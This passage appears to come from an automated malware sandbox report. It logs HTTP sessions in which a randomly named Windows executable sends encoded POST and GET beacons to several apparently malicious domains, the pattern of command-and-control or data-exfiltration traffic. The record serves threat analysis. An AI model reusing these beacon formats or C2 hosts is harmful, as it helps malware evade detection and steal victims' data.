                                                      Data Ascii: pP_8=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XMXfs4b1vcTgYSRWyHq1CNqJpQExLzvoq0YhavnLgtYZYalaFFjVngk2W+NVrirYCIzXy0kdmw6Ql5eOX+Jd96Ah6YRN3UxWDzpZguveQ9zefFeTx68KZEnaVrZ8wcZVaj5+W31FT7vQzpqAK3FkQPRb/8NtRQpIieeeIsT1+XzCpmPO30SLDamKbTbXFrUPHKev65LpGjFALoG77oacb2i87L2odrdSjr7K85ZltbwnNQv4hp6TQZR/QqXSHcGcp30fpjtL5vHN6F+e8+Rv8LhDvCS6EMHlEiJqY+3kaCdijHR0+CM/ZqRlufycJGyGcdWDGe/CFMJfJaS72OpwFotnfQ9CEbQr9QYTOqMUCTOmq+8qU+sAkGtocE4gM/uRvzE/eTEg98zmqF2+arFamJGHe6BbDkdEDPWrT66O13OYN+a8u8nlbiOAaaY7GAjemc/L+O6DXrTqVIqc1tD5dB/7bFo3+RA4LXnF/npKTborRk+nlXI5qUewRVbdAtaL8Mmnxdps8GX6mGB0oqSIdYKXihgbKx51rkSGcEzSm88wJQgHemwCqeEn7n5ZY6dsUjfpXw9oFtT6b/YI4ZIdYIogmkxWkwFiHbJpLmgIAll7XADnNS9PdWaZK8qVA1WjYzbSuVHZXvgogFT1uZ6jiFSfkC0M7AQghw2HXXovYg+cKTKhL0pBoVuneo4ERI0SDBSZXWIHcwlJST+ohaCJjNnH0Uy7Jc9zJuF/VSKEWBgqnben4BKWqVlxbm9dFB5UMu0i1Y+L/tceAOkIxM1AoP4VDPN3zhl1s/PANTA2Ei2ye6ZI6iQWTO0hGz0bLvWh4DV3WlTXafTjuwA8qr8t8vCfNgy8iqyoaeJo+LNHeo7xwUD1ExkJ74qB6tuqEBOaSEHRtatko1A2ax+c5S0AYCuuCbDP0Pk533xzefFToRtGsAEUEeBOYkhwrkJqizuf+SVxeI [TRUNCATED]
                                                      Sep 11, 2024 11:19:34.680179119 CEST1236INHTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=784; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=p2J1reMUFHMrLVh166e160a6; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=5X-Rs7sE-vu0e8kQwAvAA-N1Nvc9PnV19l4j_QpLXzcDHPby6BpF4aQLKPL0QqWuZJArjfu4xPnfpQ-AonjMIQ; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=tnbkxRndPT7Qq-RyVzKh46RdXqhfPVq_9gp-EWz059baGh967ws53g67l_W1Fg1ddIHQ-vKbR6s88zqQsgyGTA; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:34 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=171dSqHDNUUe_QfIvc3RQnrxruCX9IXFi1yS4eChHWN8UjboNzfuXJo1i0QwEvrn9K4tl5yQxl3brzPNsJutkkwQONjayI_wrwi6qR5vm9ZtfualhmGxhHeCpSA1xNHBnFaWTXZIMyytyz9kz44rwdheug6T3LoQrG8OuC_2tDSGGwMvxwFvK0bm36pWd89XILbAZ__6_NZcIyW1_50Rnkj55As0ljtBVnlf2i939SVRsl27As8YytxbpOWB1xSYLLsJGPAZlKOpKUQYtqwr2Z1krxaauD7vVAHeP03eElPF_0WUur9XhdEac0VZZQm8XU6H78LEBV
                                                      Data Raw:
                                                      Data Ascii:
                                                      Sep 11, 2024 11:19:34.680330038 CEST406INData Raw: 70 79 31 32 44 54 39 68 4e 6c 6f 63 58 6d 46 77 45 55 4b 32 49 57 64 4b 2d 31 4f 73 37 71 70 35 48 6e 4a 43 4b 35 45 4b 4b 32 6a 63 50 76 4f 55 6a 59 74 4e 4c 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                                      Data Ascii: py12DT9hNlocXmFwEUK2IWdK-1Os7qp5HnJCK5EKK2jcPvOUjYtNL; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:34 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.46335285.153.138.113803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:36.377923965 CEST499OUTGET /3lu7/?pP_8=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.mfgarage.net
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:19:37.159225941 CEST1236INHTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=969; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=vbrAm6JgxxWIY4c266e160a9; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=3VnBvPwreAgHcqpBf4plQWsouJIG7YQ-cZdP0knthwRKHA93c1Kh9Fd195HdPNRpU9icFYpLgxpGjBaf39RBiA; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=1QX2ysecUluM4Nd-DFVomhV_IraIe3rwA-JOcsdx--yLCoDNcMQ7etSNxCcOCfaIsAl16Ox_IV4MMs1RYeN4eg; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:37 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=bBr7MjBxl7RAxeLYzzlB-daF2BBJYPsZaPilYggYh6fBv2LiqH5NC68GMRuX1CTkO0ameNHjRb-YGYgzMVFd7Q3LRg5hNaW53ZUufhAi3aUEhsnds1JzpG4ttJabTjEIqAakLLP9OFhleQLIcYCC0BPpBsY2LRZr8Mo7Si72g_uf-2UDHx51UlPNTM8W-hx771As7apiswjmuVzd5gxaiC3DowIdf70hErDFzk5bVVEjYgadSq3AruaChaPif5qN1oBybl2LM0UHqcQSu_WMWEs5Oou8cRZyl03IpKyTWQmS-rZVpb7sxFFxdFPHoDJ7lz9lC0D6mJ
                                                      Data Raw:
                                                      Data Ascii:
                                                      Sep 11, 2024 11:19:37.159240007 CEST555INData Raw: 77 36 41 4f 62 31 43 70 66 59 35 51 59 31 47 43 6d 62 79 72 48 5a 4e 6c 68 57 68 62 62 6e 48 48 75 37 51 46 50 34 73 72 48 6a 47 58 5a 6d 73 54 4a 46 75 47 45 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                                      Data Ascii: w6AOb1CpfY5QY1GCmbyrHZNlhWhbbnHHu7QFP4srHjGXZmsTJFuGE; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:34:37 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.463353104.21.11.31803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:42.325709105 CEST766OUTPOST /zznj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.b5x7vk.agency
                                                      Origin: http://www.b5x7vk.agency
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.b5x7vk.agency/zznj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 6d 6c 34 53 35 37 43 2b 76 61 6b 7a 7a 52 77 7a 54 4f 35 6e 36 49 54 37 69 37 54 54 76 52 69 52 42 69 7a 36 79 5a 4f 44 66 38 45 4f 79 31 37 34 48 72 78 71 50 58 38 66 32 41 50 6e 72 2b 33 4d 4f 54 41 45 4b 71 32 71 55 32 32 45 30 6c 62 72 69 69 34 56 37 61 43 6f 4a 4e 38 47 37 51 71 57 5a 42 6c 58 36 68 53 4c 6a 67 56 34 54 35 58 65 69 57 4f 62 76 30 57 64 59 6f 67 59 36 52 52 62 30 6a 35 61 6b 36 53 75 4d 55 2b 38 53 34 49 64 32 53 6f 57 44 54 62 69 2f 59 6c 4f 4c 53 51 5a 39 2f 33 4c 78 53 72 2f 43 47 74 69 44 61 72 7a 4b 73 73 50 46 51 3d 3d
                                                      Data Ascii: pP_8=aPX6cheLmOscml4S57C+vakzzRwzTO5n6IT7i7TTvRiRBiz6yZODf8EOy174HrxqPX8f2APnr+3MOTAEKq2qU22E0lbrii4V7aCoJN8G7QqWZBlX6hSLjgV4T5XeiWObv0WdYogY6RRb0j5ak6SuMU+8S4Id2SoWDTbi/YlOLSQZ9/3LxSr/CGtiDarzKssPFQ==
                                                      Sep 11, 2024 11:19:43.317822933 CEST774INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:43 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l232qS49SdojLUekuh%2FJBVEjw2nt63OCqRz4Y1IEYZLsUAryQX2p45V0WS6iFd5wW%2Bs5fmMZCy1FrxZqmyW9FkT1PHNJCtOwHflCZbxOizhzjWz%2Fue7aDglh0VWz9Vy7dya7Lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c1693e40ae472a7-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.463354104.21.11.31803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:44.862307072 CEST786OUTPOST /zznj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.b5x7vk.agency
                                                      Origin: http://www.b5x7vk.agency
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.b5x7vk.agency/zznj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 32 52 42 48 50 36 78 62 6d 44 4d 4d 45 4f 35 56 36 7a 5a 62 77 6b 50 58 77 39 32 46 50 6e 72 2b 54 4d 4f 54 77 45 4a 5a 75 70 55 6d 32 38 2f 46 62 74 73 43 34 56 37 61 43 6f 4a 4e 6f 67 37 51 43 57 59 78 31 58 37 43 4b 49 67 67 56 37 53 35 58 65 6d 57 4f 66 76 30 57 2f 59 6f 52 51 36 55 64 62 30 6a 4a 61 6b 50 75 74 58 6b 2b 36 4e 6f 4a 43 78 78 64 50 61 78 36 65 35 5a 35 75 44 6a 73 31 38 35 6d 52 67 6a 4b 6f 51 47 4a 52 65 64 69 48 48 76 52 47 65 64 79 65 58 68 34 42 50 68 33 36 48 5a 67 69 39 4f 39 78 7a 56 49 3d
                                                      Data Ascii: pP_8=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvD2RBHP6xbmDMMEO5V6zZbwkPXw92FPnr+TMOTwEJZupUm28/FbtsC4V7aCoJNog7QCWYx1X7CKIggV7S5XemWOfv0W/YoRQ6Udb0jJakPutXk+6NoJCxxdPax6e5Z5uDjs185mRgjKoQGJRediHHvRGedyeXh4BPh36HZgi9O9xzVI=
                                                      Sep 11, 2024 11:19:45.850116968 CEST778INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:45 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsvWIlM4trV5Y%2BZqVpfvd%2FhHbUYPy9y4ovQoz47zHx%2FrfYcn4NnWtAG8HNJhcRZciluubY22hcNb2bC55%2F4JMWfdr2BecV%2FZR1XSBM9IqVWxxfcNgfAvZFRqKbTFqbXKyxn4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c1693f3df4a0f4a-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.463355104.21.11.31803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:47.407268047 CEST10868OUTPOST /zznj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.b5x7vk.agency
                                                      Origin: http://www.b5x7vk.agency
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.b5x7vk.agency/zznj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 4f 52 42 31 58 36 79 36 6d 44 50 4d 45 4f 36 56 36 77 5a 62 78 34 50 58 6f 35 32 46 4c 33 72 38 37 4d 49 77 34 45 65 59 75 70 62 6d 32 38 77 6c 62 73 69 69 34 36 37 61 53 73 4a 4e 34 67 37 51 43 57 59 33 35 58 38 52 53 49 76 41 56 34 54 35 58 61 69 57 4f 6e 76 30 50 41 59 73 4d 79 35 67 68 62 7a 44 5a 61 33 4a 36 74 62 6b 2b 34 4d 6f 4a 4b 78 78 42 71 61 78 58 76 35 5a 64 49 44 6a 49 31 38 4e 37 6f 6e 41 61 53 4f 47 52 33 43 71 36 34 41 50 78 4c 51 74 47 47 59 52 51 68 61 52 2f 69 50 34 46 41 6e 37 70 4f 73 78 6c 4b 62 2b 57 71 4e 4d 4f 6c 70 65 55 4f 46 4f 77 2b 49 69 74 45 46 68 4f 6d 48 4d 6f 74 2f 67 52 69 51 6c 4a 4e 59 75 52 63 75 74 73 30 52 64 59 4a 53 5a 77 35 53 31 2b 6d 57 6c 46 58 49 7a 41 36 2f 76 2f 59 54 56 6d 43 30 54 67 5a 48 68 58 48 41 63 63 49 55 35 67 51 4c 33 6d 75 63 4f 50 6a 38 30 73 42 6f 68 4c 46 62 6c 66 61 6d 35 69 30 78 4b 78 78 68 [TRUNCATED]
                                                      Data Ascii: pP_8=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvDORB1X6y6mDPMEO6V6wZbx4PXo52FL3r87MIw4EeYupbm28wlbsii467aSsJN4g7QCWY35X8RSIvAV4T5XaiWOnv0PAYsMy5ghbzDZa3J6tbk+4MoJKxxBqaxXv5ZdIDjI18N7onAaSOGR3Cq64APxLQtGGYRQhaR/iP4FAn7pOsxlKb+WqNMOlpeUOFOw+IitEFhOmHMot/gRiQlJNYuRcuts0RdYJSZw5S1+mWlFXIzA6/v/YTVmC0TgZHhXHAccIU5gQL3mucOPj80sBohLFblfam5i0xKxxhEOFqCDHlAZNVdzSkE65jB26rs7A2VvjgL4xqMK2IAjC2NoS1f+9MKMRLloxo12nqgf4oc9o5/SE78ABrqkRW+xgoaPjpdzfLOG5FoMZ1MAIEaNI+rOqJJCMO83envsstKyzShOd9LM5LFqgLTlEtTjGn/t6rJlmN00e8DOpLjoimQNYYJNz0UX0bIOHIbYsE8NFDB2kzrULeJpNpDFy5iBWDKC5jE9dyD2jnzg0tUziuybZeXM2HT3TChQr03+LMSN8vgZAA9r/noCI1yc5nn6QE0rSKy8HtJq+JjneEWEGlq4W6D0gDrPp4R1eUFt7b7GZnJKgiMerLW0xeLCAfqMoezhWbEi+wCQ6qCsChglc4MgzMrdiP7HNEhWPGhgjzawOFZGpUlxf+UvK0iavPtTmHJXS84BMzh7EkG/AudeZaijQHYCaxg0/GeAOAIw01c08X+ENiJ2oaxBJ9qs1lmv8otGs93/SVnnKvDrOMfBuz84HDwL4jVhsYgByP1xa98tEfk4AAada26jnYr9xmAfgbomwJZXP9t1ypYlaeFzrM/xUJDcs4Quxu3xYt5aQIXzAoSl3DRD130TC+Ewgvljiyn70dNMroRQWoOAkR9ORQlG1HjV6h5HEHzF5YSFywyeR/jonFZk86IPWi1XQ7Md3c7iYVebnz67 [TRUNCATED]
                                                      Sep 11, 2024 11:19:48.377228975 CEST782INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:48 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2xuLr1TuQ2KLuTF5lPOxB6q4WsqGUKepN5i%2Bre9rDvTrJ%2F%2B%2B7P6vBkiuL0irh%2Bfg5oTzBo%2BsyZIuBRariB4JmadAGwvx5ZZqUUdwdv3eblw4wuC8zvaYLoolDJBln2VpuJMGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c169403db5142f2-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.463356104.21.11.31803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:49.953535080 CEST500OUTGET /zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.b5x7vk.agency
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:19:50.920229912 CEST1132INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:50 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnA3NFqTD91MEVzKU3yAG79CS%2FCoHlLlDjcbJ2qwwOFSMBBWCTyU4pcWJS7ZMMDJRrySg7sT10aKma%2FlsLy%2FhwmthjUexifD2nYoDLR7XxJ9PY29Bhfxg6yjWxP9g0Vq5F1uCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c169413c89d41c1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.463357188.114.97.3803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:19:55.986718893 CEST757OUTPOST /altr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.rtpngk.xyz
                                                      Origin: http://www.rtpngk.xyz
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.rtpngk.xyz/altr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
